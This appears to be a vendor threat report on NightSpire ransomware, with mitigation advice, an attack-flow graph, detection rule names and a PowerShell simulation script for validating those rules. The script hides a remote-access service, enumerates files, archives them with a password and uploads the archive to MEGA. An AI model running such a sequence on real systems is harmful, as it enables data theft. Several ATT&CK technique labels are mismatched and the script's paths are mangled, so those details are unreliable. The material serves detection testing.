Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
NightSpire is a Go-based ransomware family first observed in early 2025 that uses a double-extortion model, stealing data before encryption and threatening to publish it on a Tor-based leak site. The ransomware appends a .nspire extension to encrypted files and places ransom notes in each affected directory, including folders tied to OneDrive. Its operators rely on legitimate remote administration tools to maintain access and use publicly available utilities for discovery, archiving, and exfiltration. Between March and June 2025, the campaign impacted at least 64 organizations across 33 countries.
Investigation
The investigation showed that attackers commonly gained initial access through exposed RDP and then installed Chrome Remote Desktop and AnyDesk as persistent services. They used Everything to quickly locate files, 7-Zip to build password-protected archives, and MEGAsync to upload stolen data to MEGA cloud storage. The Go-based encryptor ran under conhost.exe, enumerated all available drives, and encrypted files while leaving OneDrive filenames unchanged. The extortion phase relied on a Tor-hosted leak site used to pressure victims after exfiltration.
Mitigation
Organizations should reduce or eliminate direct RDP exposure, monitor for unexpected deployment of legitimate remote administration tools as services, and apply application allow-listing to binaries such as Chrome Remote Desktop and AnyDesk. Behavioral detections should focus on mass file enumeration, archive creation, and unusual uploads to cloud storage services. Regular backups and tested recovery procedures remain essential, and network controls should block known MEGA upload endpoints. Defenses can also be validated through controlled ransomware simulation exercises such as those offered by Picus.
Response
If NightSpire activity is detected, isolate the affected endpoint immediately, terminate the encryptor process, and collect volatile memory for analysis. Disable any malicious services, remove persisted remote access tools, and block related network communication. Recovery should proceed from trusted backups, and relevant stakeholders should be notified. The incident should also be reported to law enforcement, while defenders continue monitoring the associated Tor leak site for signs of published data.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff6666 classDef process fill:#ffcc99 %% Nodes action_initial_access["<b>Action</b> – Initial Access<br/><b>Technique</b> – T1136 Create Account<br/><b>Description</b>: Adversary accessed the network via Remote Desktop Protocol to obtain a foothold."] class action_initial_access action tool_rdp["<b>Tool</b> – Remote Desktop Protocol (RDP)<br/><b>Description</b>: Allows remote login to Windows systems."] class tool_rdp tool action_persistence["<b>Action</b> – Persistence<br/><b>Technique</b> – T1547.009 Shortcut Modification<br/><b>Description</b>: Installed AnyDesk and Chrome Remote Desktop as services and placed shortcuts in the Startup folder for autou2011launch."] class action_persistence action tool_anydesk["<b>Tool</b> – AnyDesk<br/><b>Function</b>: Remote access software; installed as Windows service and shortcut anydesk.lnk."] class tool_anydesk tool tool_chrome_rd["<b>Tool</b> – Chrome Remote Desktop<br/><b>Function</b>: Remote access; runs as remoting_host.exe service."] class tool_chrome_rd tool action_collection["<b>Action</b> – Collection<br/><b>Technique</b> – T1560.001 Archive Collected Data<br/><b>Description</b>: Used 7u2011Zip to compress selected folders into passwordu2011protected archives after enumerating files with Everything utility."] class action_collection action tool_7zip["<b>Tool</b> – 7u2011Zip<br/><b>Function</b>: Compresses data into passwordu2011protected archives."] class tool_7zip tool tool_everything["<b>Tool</b> – Everything<br/><b>Function</b>: Fast fileu2011system search utility used for enumeration."] class tool_everything tool action_exfiltration["<b>Action</b> – Exfiltration<br/><b>Techniques</b> – T1537 Transfer Data to Cloud Account<br/>T1567.002 Exfiltration Over Web Service<br/><b>Description</b>: Uploaded staged archives to MEGA cloud storage via MEGAsync."] class action_exfiltration action tool_megasync["<b>Tool</b> – MEGAsync<br/><b>Function</b>: Synchronizes local files with MEGA cloud storage for exfiltration."] class tool_megasync tool action_impact["<b>Action</b> – Impact<br/><b>Technique</b> – T1486 Data Encrypted for Impact<br/><b>Description</b>: Gou2011based encryptor executed through conhost.exe, encrypted files, appended .nspire extension, and dropped ransom notes in each folder."] class action_impact action malware_encryptor["<b>Malware</b> – Go Encryptor<br/><b>Function</b>: Encrypts files, appends .nspire, drops ransom notes."] class malware_encryptor malware process_conhost["<b>Process</b> – conhost.exe<br/><b>Role</b>: Executes the Go encryptor payload."] class process_conhost process %% Connections action_initial_access –>|uses| tool_rdp action_initial_access –>|leads_to| action_persistence action_persistence –>|installs| tool_anydesk action_persistence –>|installs| tool_chrome_rd action_persistence –>|leads_to| action_collection action_collection –>|uses| tool_7zip action_collection –>|enumerates_with| tool_everything action_collection –>|leads_to| action_exfiltration action_exfiltration –>|uses| tool_megasync action_exfiltration –>|leads_to| action_impact action_impact –>|executes| process_conhost process_conhost –>|launches| malware_encryptor "
Attack Flow
Detections
Possible Data Collection [7zip] (via cmdline)
View
Alternative Remote Access / Management Software (via process_creation)
View
Possible Hidden Chrome Remote Desktop Install (via cmdline)
View
Alternative Remote Access / Management Software (via system)
View
Alternative Remote Access / Management Software (via audit)
View
NightSpire Ransomware Persistence and Exfiltration Tools Detection [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands:
- Persistence Setup (T1547 / T1219): Install Chrome Remote Desktop (default path) and start its service to obtain persistent remote control.
- Discovery (T1083): Use Everything.exe to enumerate all files on the C: drive, saving the output to a temporary list.
- Archiving (T1037 / T1083): Invoke 7‑Zip to compress the discovered files into a password‑protected archive.
- Exfiltration (T1219.003): Launch MEGAsync to upload the archive to a MEGA account.
The sequence ensures that selection_remote_access (Chrome Remote Desktop) is active while at least one of selection_discovery, selection_archive, or selection_exfiltration occurs, satisfying the rule’s condition.
-
Regression Test Script:
# ------------------------------------------------------------------------- # NightSpire Lateral Persistence & Exfiltration Simulation # ------------------------------------------------------------------------- # Prerequisites: # - Chrome Remote Desktop installed at default path # - Everything.exe installed at default path # - 7z.exe installed at default path # - MEGAsync installed at default user profile path # ------------------------------------------------------------------------- # 1. Ensure Chrome Remote Desktop service is running (simulates persistence) $crdPath = "$Env:ProgramFiles(x86)GoogleChrome Remote Desktop147.0.7727.3remoting_host.exe" if (Test-Path $crdPath) { Start-Process -FilePath $crdPath -ArgumentList "--start-service" -WindowStyle Hidden Write-Host "Chrome Remote Desktop service started." } else { Write-Error "Chrome Remote Desktop not found at $crdPath" exit 1 } # 2. File discovery with Everything $everythingPath = "$Env:ProgramFilesEverythingEverything.exe" $discoveryOutput = "$env:TEMPfilelist.txt" if (Test-Path $everythingPath) { & $everythingPath -search "C:" -output $discoveryOutput Write-Host "Discovery completed, results saved to $discoveryOutput" } else { Write-Error "Everything.exe not found at $everythingPath" exit 1 } # 3. Archive the discovered files with 7‑Zip $sevenZipPath = "$Env:ProgramFiles7-Zip7z.exe" $archivePath = "$env:TEMPexfil_archive.zip" if (Test-Path $sevenZipPath) { & $sevenZipPath a -tzip $archivePath "@$discoveryOutput" -p"StrongP@ssw0rd!" Write-Host "Archive created at $archivePath" } else { Write-Error "7z.exe not found at $sevenZipPath" exit 1 } # 4. Upload archive via MEGAsync (exfiltration) $megaPath = "$Env:LOCALAPPDATAMEGAsyncMEGAsync.exe" if (Test-Path $megaPath) { & $megaPath --upload $archivePath Write-Host "Upload initiated via MEGAsync." } else { Write-Error "MEGAsync.exe not found at $megaPath" exit 1 } # End of simulation -
Cleanup Commands:
# Stop Chrome Remote Desktop service Stop-Process -Name "remoting_host" -Force -ErrorAction SilentlyContinue # Remove temporary files Remove-Item -Path "$env:TEMPfilelist.txt" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPexfil_archive.zip" -Force -ErrorAction SilentlyContinue # Optionally stop MEGAsync if running Stop-Process -Name "MEGAsync" -Force -ErrorAction SilentlyContinue